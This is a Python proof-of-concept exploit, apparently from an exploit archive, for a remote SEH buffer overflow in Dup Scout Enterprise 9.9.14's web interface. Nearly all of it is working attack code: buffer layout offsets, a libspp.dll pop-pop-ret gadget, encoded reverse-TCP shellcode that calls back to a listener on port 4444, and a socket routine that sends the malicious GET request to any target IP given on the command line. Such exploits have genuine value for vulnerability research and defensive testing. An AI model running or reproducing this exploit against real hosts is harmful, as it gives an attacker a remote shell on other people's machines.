Dup Scout Enterprise 9.9.14 - Remote Buffer Overflow (SEH)
#!/usr/bin/env python3
# Dup Scout Enterprise v9.9.14 SEH Overflow
# This is my PoC for the previously discovered Dup Scout Enterprise SEH
# overflow vuln.
#
# The original exploit can be viewed here: https://www.exploit-db.com/exploits/42557
import socket
from struct import pack
import sys
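PORT = 8080      # Dup Scout Enterprise web interface
SIZE = 5000      # total overflow buffer length; enough to clobber the SEH record
TIMEOUT = 10     # seconds for connect/send; the script used to block forever

# Bytes that must never appear in the request path: NUL ends the C string and
# tab/LF/CR/space terminate the URI in the HTTP request line, so any of them
# cuts the buffer short before the SEH record is reached.  They are exactly the
# characters the shellcode below was encoded to avoid (-b in the msfvenom line).
BAD_CHARS = b"\x00\x09\x0a\x0d\x20"

# Offsets/fragments of the overflow buffer, taken from the original PoC.
NSEH_OFFSET = 2492               # nSEH lands at 2492; the SEH handler pointer at 2496
NOP_SLED = b"\x90" * 20          # sled in front of the shellcode
NSEH = b"\xEB\x06\x90\x90"       # nSEH: jmp short +6 -> skips the handler pointer
# SEH: 0x101516d0 in libspp.dll, pop r32; pop r32; ret.  Address is specific to
# the libspp.dll shipped with 9.9.14 (presumably chosen because that module lacks
# SafeSEH/ASLR) -- re-verify it in a debugger before reusing against another build.
SEH_GADGET = b"\xd0\x16\x15\x10"
# jmp rel32 back into the NOP sled (displacement 0xffffbf37, i.e. -0x40c4 from the
# start of this instruction).  The distance was measured on the original target's
# stack layout; confirm it in a debugger if anything in the buffer changes.
JMP_BACK = b"\xE9\x37\xBF\xFF\xFF"

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.190.137
# LPORT=4444 -b "\x00\x09\x0a\x0d\x20" -f python -v shellcode
# NOTE: the listener address/port are baked into these encoded bytes.  Regenerate
# with your own LHOST/LPORT (keeping the same -b list) before use.
shellcode = b""
shellcode += b"\xbe\xde\xde\xed\x74\xdb\xcd\xd9\x74\x24\xf4"
shellcode += b"\x58\x33\xc9\xb1\x52\x83\xc0\x04\x31\x70\x0e"
shellcode += b"\x03\xae\xd0\x0f\x81\xb2\x05\x4d\x6a\x4a\xd6"
shellcode += b"\x32\xe2\xaf\xe7\x72\x90\xa4\x58\x43\xd2\xe8"
shellcode += b"\x54\x28\xb6\x18\xee\x5c\x1f\x2f\x47\xea\x79"
shellcode += b"\x1e\x58\x47\xb9\x01\xda\x9a\xee\xe1\xe3\x54"
shellcode += b"\xe3\xe0\x24\x88\x0e\xb0\xfd\xc6\xbd\x24\x89"
shellcode += b"\x93\x7d\xcf\xc1\x32\x06\x2c\x91\x35\x27\xe3"
shellcode += b"\xa9\x6f\xe7\x02\x7d\x04\xae\x1c\x62\x21\x78"
shellcode += b"\x97\x50\xdd\x7b\x71\xa9\x1e\xd7\xbc\x05\xed"
shellcode += b"\x29\xf9\xa2\x0e\x5c\xf3\xd0\xb3\x67\xc0\xab"
shellcode += b"\x6f\xed\xd2\x0c\xfb\x55\x3e\xac\x28\x03\xb5"
shellcode += b"\xa2\x85\x47\x91\xa6\x18\x8b\xaa\xd3\x91\x2a"
shellcode += b"\x7c\x52\xe1\x08\x58\x3e\xb1\x31\xf9\x9a\x14"
shellcode += b"\x4d\x19\x45\xc8\xeb\x52\x68\x1d\x86\x39\xe5"
shellcode += b"\xd2\xab\xc1\xf5\x7c\xbb\xb2\xc7\x23\x17\x5c"
shellcode += b"\x64\xab\xb1\x9b\x8b\x86\x06\x33\x72\x29\x77"
shellcode += b"\x1a\xb1\x7d\x27\x34\x10\xfe\xac\xc4\x9d\x2b"
shellcode += b"\x62\x94\x31\x84\xc3\x44\xf2\x74\xac\x8e\xfd"
shellcode += b"\xab\xcc\xb1\xd7\xc3\x67\x48\xb0\x2b\xdf\xec"
shellcode += b"\xc9\xc4\x22\x10\xdb\x48\xaa\xf6\xb1\x60\xfa"
shellcode += b"\xa1\x2d\x18\xa7\x39\xcf\xe5\x7d\x44\xcf\x6e"
shellcode += b"\x72\xb9\x9e\x86\xff\xa9\x77\x67\x4a\x93\xde"
shellcode += b"\x78\x60\xbb\xbd\xeb\xef\x3b\xcb\x17\xb8\x6c"
shellcode += b"\x9c\xe6\xb1\xf8\x30\x50\x68\x1e\xc9\x04\x53"
shellcode += b"\x9a\x16\xf5\x5a\x23\xda\x41\x79\x33\x22\x49"
shellcode += b"\xc5\x67\xfa\x1c\x93\xd1\xbc\xf6\x55\x8b\x16"
shellcode += b"\xa4\x3f\x5b\xee\x86\xff\x1d\xef\xc2\x89\xc1"
shellcode += b"\x5e\xbb\xcf\xfe\x6f\x2b\xd8\x87\x8d\xcb\x27"
shellcode += b"\x52\x16\xfb\x6d\xfe\x3f\x94\x2b\x6b\x02\xf9"
shellcode += b"\xcb\x46\x41\x04\x48\x62\x3a\xf3\x50\x07\x3f"
shellcode += b"\xbf\xd6\xf4\x4d\xd0\xb2\xfa\xe2\xd1\x96"


def build_payload(sc: bytes, size: int = SIZE) -> bytes:
    """Assemble the overflow buffer that overwrites the SEH record.

    Layout (byte offsets):
        0               NOP_SLED followed by ``sc`` -- the shellcode sits at the
                        *front* of the buffer because there is not enough stack
                        left past the SEH record to hold it
        ...             'A' filler up to NSEH_OFFSET
        NSEH_OFFSET     NSEH: jmp short +6 over the handler pointer
        NSEH_OFFSET+4   SEH_GADGET: pop/pop/ret
        NSEH_OFFSET+8   JMP_BACK: near jmp backwards into the NOP sled
        ...             'D' filler up to ``size`` so the overflow actually fires

    Args:
        sc:   encoded shellcode; must contain none of BAD_CHARS.
        size: total buffer length (default SIZE).

    Returns:
        The raw buffer, exactly ``size`` bytes long.

    Raises:
        ValueError: if sled+shellcode do not fit below NSEH_OFFSET, if ``size``
            is smaller than the fixed part, or if the finished buffer contains
            a byte from BAD_CHARS.  Each of these would otherwise break the
            offsets silently (``b"A" * negative`` is just ``b""``) or get the
            request truncated by the HTTP parser before the SEH record.
    """
    head = NOP_SLED + sc
    if len(head) > NSEH_OFFSET:
        raise ValueError(
            "sled+shellcode is %d bytes, must fit below nSEH offset %d"
            % (len(head), NSEH_OFFSET)
        )
    buf = head + b"A" * (NSEH_OFFSET - len(head))
    buf += NSEH + SEH_GADGET + JMP_BACK
    if len(buf) > size:
        raise ValueError("size %d is smaller than the fixed part (%d bytes)" % (size, len(buf)))
    buf += b"D" * (size - len(buf))  # padding to trigger the crash

    # Refuse to send anything the parser would cut short; a single bad byte
    # turns a working exploit into a silent no-op.
    bad = sorted(set(buf) & set(BAD_CHARS))
    if bad:
        raise ValueError("payload contains bad chars: " + ", ".join("0x%02x" % b for b in bad))
    return buf


def build_request(buf: bytes) -> bytes:
    """Wrap ``buf`` in the malformed GET request whose path overflows the handler."""
    return b"GET /../" + buf + b" HTTP/1.1\r\n\r\n"


def main(argv: list[str]) -> int:
    """Entry point: ``exploit.py <IP_ADDRESS>``.  Returns the process exit code."""
    if len(argv) != 2:
        print("Usage: python3 exploit.py <IP_ADDRESS>")
        return 1
    ip = argv[1]
    packet = build_request(build_payload(shellcode))
    # create_connection + with: the socket is closed even if sending raises.
    # sendall (not send) guarantees the whole ~5 KB request goes out; a partial
    # send would never reach the SEH record.
    with socket.create_connection((ip, PORT), timeout=TIMEOUT) as s:
        print("Sending packet of %d bytes" % len(packet))
        s.sendall(packet)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))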